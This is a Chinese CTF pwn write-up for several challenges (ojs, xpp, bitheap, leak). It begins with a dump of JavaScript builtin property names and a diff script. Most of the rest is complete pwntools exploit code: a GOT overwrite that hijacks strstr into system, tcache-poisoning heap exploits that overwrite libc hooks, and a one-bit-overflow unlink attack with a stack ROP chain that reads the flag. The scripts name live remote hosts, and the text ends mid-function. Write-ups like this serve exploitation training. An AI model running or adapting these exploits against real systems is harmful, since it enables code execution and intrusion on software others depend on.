prop:caller
prop:length
prop:length
prop:replace
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:search
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:slice
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:split
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:substr
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:substring
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleLowerCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleUpperCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLowerCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toUpperCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:trim
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:trimLeft
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:trimRight
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:String
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:MAX_VALUE
prop:MIN_VALUE
prop:NEGATIVE_INFINITY
prop:POSITIVE_INFINITY
prop:NaN
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toExponential
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toFixed
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toPrecision
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Number
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Boolean
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:now
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:parse
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:UTC
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isDST
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getDay
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getTime
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getTimezoneOffset
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCDay
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setTime
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toDateString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toGMTString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toISOString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toJSON
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleDateString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleTimeString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toTimeString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toUTCString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Date
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:global
prop:ignoreCase
prop:lastIndex
prop:multiline
prop:length
prop:source
prop:sticky
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:exec
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:test
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:RegExp
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:length
prop:name
prop:length
prop:message
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:EvalError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:RangeError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:ReferenceError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:SyntaxError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:TypeError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:URIError
prop:Error
prop:E
prop:LN2
prop:LN10
prop:LOG2E
prop:LOG10E
prop:PI
prop:M_PI_2
prop:M_PI_4
prop:M_1_PI
prop:M_2_PI
prop:M_2_SQRTPI
prop:SQRT1_2
prop:SQRT2
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:abs
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:acos
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:asin
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:atan
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:atan2
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:ceil
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:cos
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:exp
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:floor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:log
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:max
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:min
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:pow
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:random
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:round
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:sin
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:sqrt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:tan
prop:Math
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:log
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:error
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:info
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:assert
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:time
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:timeEnd
prop:console
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:run
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:info
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:spy
prop:gc
prop:NaN
prop:Infinity
prop:undefined
prop:this
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Float32Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Float64Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Uint8Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Uint16Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Uint32Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Int8Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Int16Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Int32Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isNaN
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isFinite
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:parseInt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:parseFloat
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:eval
prop:length
prop:FH_VERSION
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:load
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:print
'''

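# Diff the two global-property dumps defined above as triple-quoted strings:
# every line present in `a` but absent from `b` is printed, which is how the
# added/renamed builtins of the patched interpreter were spotted. The order
# and duplicates of `a` are preserved; `b` is turned into a set so the
# membership test is O(1) per line instead of a linear scan over ~5000
# entries (O(n*m) originally).
a = a.splitlines()
b = b.splitlines()
known = set(b)
for line in a:
    if line not in known:
        print(line)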

找到新增函数 charTo,charAt有越界读,并且发现 charTo 被修改,存在越界写,需要保证string长度为3

from pwn import *
context.log_level = "debug"
# Local alternative used while debugging (the REPL was driven through a pty):
# sh = process(['./ojs'], stdin=PTY)
sh = remote('47.95.3.91', 24377)

# gdb.attach(sh, "b *0x0000000000410C2F")

# Replay poc.js into the interpreter one line at a time, waiting for the
# REPL prompt before each line. Lines keep their own trailing newline and
# sendline adds another; the extra empty line only yields an extra prompt.
with open("poc.js", "r") as poc:
    for line in poc:
        sh.sendlineafter(">", line)

# By the time poc.js is done the strstr GOT slot has been redirected to
# system (see the note above), so the shell it spawns receives this.
sh.sendline("cat flag")
sh.interactive()

字符串的 replace 内部会调用 strstr。先调用一次 replace,让延迟绑定把 strstr 的 GOT 表项解析成真实的 libc 地址(前提是二进制非 PIE 且 GOT 可写,即没有 Full RELRO);然后用越界读取出这个地址、用越界写把它改成 system 的地址;再次触发 replace 时,strstr 的第一个参数(被处理的字符串本身)就会作为命令交给 system 执行,从而 RCE。

a = "ABC";
x = a.charTo(0, 0x11);

sh = "/bin/sh"
sh.replace('x', 'y')

strstr = 0x629290;
offset = strstr - x;

o1 = a.charAt(offset) & 0xff;
o2 = a.charAt(offset + 1) & 0xff;
o3 = a.charAt(offset + 2) & 0xff;

a.charTo(offset, o1 - 0x50)
a.charTo(offset + 1, o2 + 0x4a)
a.charTo(offset + 2, o3 - 0x7)

sh.replace('x', 'y')

xpp

node 结构体

00000000 node            struc ; (sizeof=0x20, mappedto_21)
00000000 left            dq ?                    ; offset
00000008 right           dq ?                    ; offset
00000010 value           dq ?                    ; offset
00000018 id              dq ?
00000020 node            ends

string 结构体

00000000 string          struc ; (sizeof=0x30, mappedto_20)
00000000 cache           db 24 dup(?)
00000018 ptr             dq ?                    ; offset
00000020 len             dq ?
00000028 key             dq ?
00000030 string          ends

EXP

from pwn import *

# Local copy of the challenge binary; swap for remote(host, port) to run live.
sh = process(["./xpp_bak"])

def choice(idx):
    """Select menu entry ``idx`` once the menu's last line ("5. Exit") has been printed."""
    selection = str(idx)
    sh.sendlineafter("5. Exit", selection)

def add(content):
    """Menu 1: store a new note with ``content``.

    Judging by the calls below, the integer key used to address the note
    later is its first 8 content bytes read as a little-endian number.
    """
    choice(1)
    sh.sendlineafter("Content:", content)

def show(key):
    """Menu 2: print the note stored under integer ``key``."""
    choice(2)
    key_text = str(key)
    sh.sendlineafter("Key: ", key_text)

def delete(key):
    """Menu 3: free the note stored under integer ``key``."""
    choice(3)
    key_text = str(key)
    sh.sendlineafter("Key:", key_text)

def edit(key, content):
    """Menu 4: overwrite the note under integer ``key`` with ``content``."""
    choice(4)
    sh.sendlineafter("Key:", str(key))
    new_note = str(content)
    sh.sendlineafter("New note:", new_note)

def deprotect(prot):
    """Undo glibc (>= 2.32) safe-linking on a tcache/fastbin next pointer.

    glibc stores ``next ^ (slot_address >> 12)``. For a 48-bit pointer the
    top 12 bits survive the shift untouched, so they are taken as-is and
    each lower 12-bit group is XORed with the group recovered just above
    it. The result is exact only when the slot and the pointer agree on
    bits 12..47 (same 4 KiB page), which is usually true for neighbouring
    tcache chunks; otherwise the affected group is wrong. Bits of ``prot``
    above 47 are ignored.
    """
    decoded = 0
    above = 0
    for shift in (36, 24, 12, 0):
        above ^= (prot >> shift) & 0xfff
        decoded |= above << shift
    return decoded

context.log_level = "debug"
# add('0' * 0x800)
add("6" * 0x800)
add("0" * 8)
show(str(0x3030303030303030))
libc_base = u64(sh.recvuntil('\\x7f')[-6:].ljust(8, '\\x00')) - 0x21a330
log.success("libc_base:\\t" + hex(libc_base))

add("0" * 0x20)
add("2" * 0x8)
add("5" * 0x20)
add("4" * 0x20)
add("0" * 0x20)
delete(str(0x3535353535353535))
delete(str(0x3636363636363636))

add("0" * 0x20)
add("1" * 0x20)
add("3" * 8)

delete(str(0x3131313131313131))

show(str(0x3232323232323232))
heap_leak = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00'))
log.success("heap_leak:\\t" + hex(heap_leak))

heap_base = deprotect(heap_leak) - 0x12840
log.success("heap_base:\\t" + hex(heap_base))

std_Init = libc_base + 0x3e58f0

environ = libc_base + 0x221200

cpp_fflush = libc_base + 0x554260
system_addr = libc_base + 0x50d60
cerr = libc_base + 0x556420

edit(str(0x3232323232323232), p64((cerr - 0x10) ^ ((heap_base + 0x127d0) >> 12)))
add("9" * 8)
add('a' * 0x10 + '/bin/sh\\x00')

delete(str(0x3939393939393939))

edit(str(0x3333333333333333), p64((cpp_fflush) ^ ((heap_base + 0x127d0) >> 12)))
add('k' * 8)
add(p64(system_addr))

sh.interactive()

bitheap

Edit 功能可以有一个位的溢出,可以覆盖下个堆块的 prev_inuse,可泄露堆地址的 off by null

from pwn import *

context.log_level = "debug"
context.arch = "amd64"
sh = remote('101.201.71.136', 33358)
#sh = process(['./bitheap'])

def choice(idx):
    """Answer the "choice: " menu prompt with option ``idx``."""
    option = str(idx)
    sh.sendlineafter("choice: ", option)

def add(idx, size):
    """Menu 1: allocate note ``idx`` with a buffer of ``size`` bytes."""
    choice(1)
    for prompt, value in (("Index: ", idx), ("Size: ", size)):
        sh.sendlineafter(prompt, str(value))

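def edit(idx, content, tag=False):
    """Menu 2: rewrite note ``idx``.

    The program accepts the new content one *bit* per character ('0'/'1'),
    least-significant bit of each byte first, which the encoding below
    reproduces. ``tag=True`` appends one extra '0' bit: that single bit
    spills into the next chunk's size field and clears its prev_inuse flag
    (the whole exploit rests on this one-bit overflow, see the note above).

    ``content`` may be bytes or str. On Python 2 both are the same type; on
    Python 3 a str is encoded as latin-1 so every character is one byte
    (the original ``u8(i)`` loop only worked on Python 2 strings).
    """
    choice(2)
    sh.sendlineafter("Index: ", str(idx))

    if not isinstance(content, bytes):
        content = content.encode("latin-1")
    bits = "".join(bin(byte)[2:].rjust(8, '0')[::-1] for byte in bytearray(content))
    if tag:
        bits += '0'
    sh.sendafter("Content: ", bits)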

def show(idx):
    """Menu 3: print the contents of note ``idx``."""
    choice(3)
    index = str(idx)
    sh.sendlineafter("Index: ", index)

def delete(idx):
    """Menu 4: free note ``idx``."""
    choice(4)
    index = str(idx)
    sh.sendlineafter("Index: ", index)

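# ---- stage 1: heap address leak ------------------------------------------
add(0, 0x88)
add(1, 0x88)
# Seven filler notes of the same size: once they are all freed the tcache
# bin for 0x90-byte chunks is full and the next free of that size bypasses
# tcache.
for i in range(2, 2 + 7):
    add(i, 0x88)

# Free 0 then 1 and take them back in reverse order; the chunk handed to
# note 1 still carries its tcache next pointer (a heap address) in its data.
# Bytes literals keep the slicing/padding valid on both Python 2 and 3.
delete(0)
delete(1)
add(1, 0x88)
add(0, 0x88)
show(1)
heap_base = u64(sh.recvuntil(b'\n', drop=True)[-6:].ljust(8, b'\x00')) - 0x260
log.success("heap_base:\t" + hex(heap_base))

# ---- stage 2: fake free chunk + one-bit overflow -> overlapping chunks ----
# Note 1's chunk header is at heap_base + 0x2e0. Its data is rewritten as a
# chunk whose fd/bk point back at the copy of its own address stored at
# fake_ptr, satisfying unlink()'s fd->bk == p && bk->fd == p check. The
# trailing p64(0x90) is the next chunk's prev_size, and tag=True writes one
# more '0' bit into that chunk's size field, clearing prev_inuse.
fake_chunk = heap_base + 0x2e0
fake_ptr = fake_chunk + 0x20
fd = fake_ptr - 0x18
bk = fake_ptr - 0x10
chunk_data = p64(fd) + p64(bk) + p64(fake_chunk)
chunk_data = chunk_data.ljust(0x80, b'\x00') + p64(0x90)
edit(1, chunk_data, True)
# Fill tcache[0x90] with the seven fillers ...
for i in range(2, 2 + 7):
    delete(i)

# ... so this free goes past tcache, consolidates forward through note 1's
# "free" chunk and puts the merged chunk into the unsorted bin.
delete(0)

# Drain tcache again, then carve note 0 back out of the unsorted chunk; the
# remainder overlaps note 1 and holds unsorted-bin fd/bk (libc pointers).
for i in range(2, 2 + 7):
    add(i, 0x88)

add(0, 0x88)
show(1)
libc_base = u64(sh.recvuntil(b'\n', drop=True)[-6:].ljust(8, b'\x00')) - 0x3ebca0
log.success("libc_base:\t" + hex(libc_base))

# Gadget and symbol offsets for the challenge's libc build (the 0x3ebca0
# above is the same build); all of them must be re-derived for another libc.
pop_rdi_addr = libc_base + 0x2164f
pop_rsi_addr = libc_base + 0x23a6a
pop_rdx_addr = libc_base + 0x1b96
pop_rax_addr = libc_base + 0x1b500
syscall_addr = libc_base + 0xd2625
free_hook_addr = libc_base + 0x3ed8e8
environ = libc_base + 0x3ee098
gets_addr = libc_base + 0x80060

# ---- stage 3: stack leak via tcache poisoning ----------------------------
# Note 9 should be served from the unsorted remainder, i.e. it overlaps
# note 1. Freeing 0 then 9 puts 9 at the head of tcache; editing note 1
# rewrites 9's next pointer, so the second add() lands on libc's environ.
add(9, 0x88)
delete(0)
delete(9)
edit(1, p64(environ))
add(9, 0x88)
add(0, 0x88)
show(0)
stack = u64(sh.recvuntil(b'\n', drop=True)[-6:].ljust(8, b'\x00')) - 0x120
log.success("stack:\t" + hex(stack))

# Same trick again: point note 2 at the stack just below the return address
# the edit path returns through (the 0x120 delta from environ is specific
# to this binary/libc).
delete(2)
delete(9)

edit(1, p64(stack - 0x18))

add(9, 0x88)
add(2, 0x88)

# ROP stage 1: read(0, stack, 0x200) pulls a longer chain onto the stack.
# There is no `pop rax` in this chain, so it relies on rax already being 0
# (SYS_read) when the chain starts -- verify under gdb if it misbehaves.
start_addr = stack - 0x18
rop_chain1 = flat([
    pop_rdi_addr,
    0,
    pop_rsi_addr,
    stack,
    pop_rdx_addr,
    0x200,
    syscall_addr,
])

# ROP stage 2: open("flag", O_RDONLY) / read / write(1, ...). The file name
# is the 'flag' written at start_addr below. It assumes the flag gets fd 3,
# i.e. no other descriptors are open at that point.
rop_chain2 = flat([
    pop_rdi_addr,
    start_addr,
    pop_rsi_addr,
    0,
    pop_rax_addr,  # sys_open('flag', 0)
    2,
    syscall_addr,
    pop_rax_addr,  # sys_read(flag_fd, heap, 0x100)
    0,
    pop_rdi_addr,
    3,
    pop_rsi_addr,
    start_addr + 0x200,
    pop_rdx_addr,
    0x100,
    syscall_addr,
    pop_rax_addr,  # sys_write(1, heap, 0x100)
    1,
    pop_rdi_addr,
    1,
    pop_rsi_addr,
    start_addr + 0x200,
    syscall_addr
])

#gdb.attach(sh, "b *$rebase(0x0000000000000EA7)")
# Write 'flag\0' + chain 1 through note 2, which now aliases the stack. This
# is the edit() protocol inlined: the menu choice is sent without waiting
# for the prompt, then the content as one '0'/'1' character per bit, LSB
# first (bytearray() makes the loop work on both Python 2 and 3).
content = b'flag'.ljust(0x18, b'\x00') + rop_chain1
sh.sendline(str(2))
sh.sendlineafter("Index: ", str(2))

send_content = "".join(bin(byte)[2:].rjust(8, '0')[::-1] for byte in bytearray(content))
sh.sendafter("Content: ", send_content)
# Chain 1's read() receives this: a ret sled (`pop rdi; ret` is two bytes,
# so +1 is a bare ret) followed by chain 2.
sh.sendline(p64(pop_rdi_addr + 1) * 0x10 + rop_chain2)

sh.interactive()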

leak

解题思路见 VNCTF 2022 HideOnHeap 这题

# encoding: utf-8
from pwn import *

# Path of the challenge binary; get_file()/get_libc() load it on demand.
file_name = "./leak"
# ELF handles, None until get_file()/get_libc() fill them in.
elf = None
libc = None
# Short I/O timeout so a dead remote fails fast instead of hanging the retry loop.
context.timeout = 1

def get_file(dic=""):
    context.binary = dic + file_name
    return context.binary

def get_libc(dic=""):
    if context.binary == None:
        context.binary = dic + file_name
    assert isinstance(context.binary, ELF)
    libc = None
    for lib in context.binary.libs:
        if '/libc.' in lib or '/libc-' in lib:
            libc = ELF(lib, checksec=False)
    return libc

def get_sh(Use_other_libc=False, Use_ssh=False):
    """Return a tube to the target.

    Without REMOTE on the pwntools command line: a local process. With
    REMOTE: a remote() built from argv ("host:port" or "host port"), or,
    when ``Use_ssh`` is set, a process started over ssh(user, host, port,
    password) taken from argv[3], argv[1], argv[2], argv[4]. ``Use_other_libc``
    swaps the module-level libc for ./libc.so.6 first.

    NOTE: in ssh mode the password travels on the command line and is
    visible in shell history and process listings.
    """
    global libc
    if not args['REMOTE']:
        return process([file_name])
    if Use_other_libc:
        libc = ELF("./libc.so.6", checksec=False)
    if Use_ssh:
        session = ssh(sys.argv[3], sys.argv[1], int(sys.argv[2]), sys.argv[4])
        return session.process([file_name])
    target = sys.argv[1]
    if ":" in target:
        parts = target.split(':')
        return remote(parts[0], int(parts[1]))
    return remote(target, int(sys.argv[2]))

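def get_address(sh, libc=False, info=None, start_string=None, address_len=None, end_string=None, offset=None,
                int_mode=False):
    """Read one address from ``sh``, add ``offset`` and return it.

    Modes, in priority order:
      libc=True    -- read up to the first 0x7f byte and unpack the 6 bytes
                      ending there (a little-endian userland pointer).
      int_mode     -- read up to end_string and parse the text as hex.
      address_len  -- take that many raw bytes from the next recv().
      otherwise    -- read up to end_string and unpack the raw bytes
                      (u64 on amd64, u32 on other arches).
    ``start_string`` is consumed first when given. ``info`` is a label for
    the success log line (defaults to a tab-terminated "libc_base:" in libc
    mode; None disables logging).

    Byte literals are used for the padding so the call works on both
    Python 2 and 3 (the original mixed str padding into bytes).
    """
    if start_string != None:
        sh.recvuntil(start_string)
    if libc == True:
        if info == None:
            info = 'libc_base:\t'
        return_address = u64(sh.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
    elif int_mode:
        return_address = int(sh.recvuntil(end_string, drop=True), 16)
    elif address_len != None:
        return_address = u64(sh.recv()[:address_len].ljust(8, b'\x00'))
    elif context.arch == 'amd64':
        return_address = u64(sh.recvuntil(end_string, drop=True).ljust(8, b'\x00'))
    else:
        return_address = u32(sh.recvuntil(end_string, drop=True).ljust(4, b'\x00'))
    if offset != None:
        return_address = return_address + offset
    if info != None:
        log.success(info + str(hex(return_address)))
    return return_address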

def get_flag(sh):
    """Drain pending output, send ``cat flag`` and return what arrives within 0.3 s.

    Returns "" if the tube hits EOF at any point.
    """
    try:
        sh.recvrepeat(0.1)
        sh.sendline('cat flag')
        output = sh.recvrepeat(0.3)
    except EOFError:
        output = ""
    return output

def get_gdb(sh, addr=None, gdbscript=None, stop=False):
    """Attach gdb to ``sh`` when running locally (no-op under REMOTE).

    A full ``gdbscript`` takes precedence; otherwise ``addr`` becomes a
    breakpoint at ``$rebase(addr)`` (pwndbg-style PIE-relative address);
    with neither, gdb is attached without a script. ``stop`` pauses the
    exploit afterwards so breakpoints can be placed by hand.
    """
    if args['REMOTE']:
        return
    if gdbscript is not None:
        script = gdbscript
    elif addr is not None:
        script = 'b *$rebase(' + hex(addr) + ")"
    else:
        script = None
    if script is None:
        gdb.attach(sh)
    else:
        gdb.attach(sh, script)
    if stop:
        pause()

def Attack(target=None, elf=None, libc=None):
    """Run pwn() against the global tube ``sh``, reconnecting on EOF.

    If ``sh`` is None, a Target object (from the author's harness; not part
    of this file) provides sh/elf/libc. pwn() is retried up to 30 times when
    the connection dies with EOFError, reconnecting through the Target or
    get_sh(); Ctrl-C stops early. After the loop the flag is fetched with
    get_flag() regardless of whether any attempt succeeded, so the caller
    must check the returned string (it may also be the ERROR message below).
    """
    global sh
    if sh is None:
        from Class.Target import Target
        assert target is not None
        assert isinstance(target, Target)
        sh = target.sh
        elf = target.elf
        libc = target.libc
    assert isinstance(elf, ELF)
    assert isinstance(libc, ELF)
    try_count = 0
    while try_count < 30:
        try_count += 1
        try:
            pwn(sh, elf, libc)
            break
        except KeyboardInterrupt:
            break
        except EOFError:
            # Expected when pwn()'s partial overwrites miss (they depend on
            # ASLR): drop the dead tube and start over with a fresh one.
            sh.close()
            if target is not None:
                sh = target.get_sh()
                target.sh = sh
                if target.connect_fail:
                    return 'ERROR : Can not connect to target server!'
            else:
                sh = get_sh()
    flag = get_flag(sh)
    return flag

def choice(idx):
    """Answer the "choice: " menu prompt with option ``idx``."""
    option = str(idx)
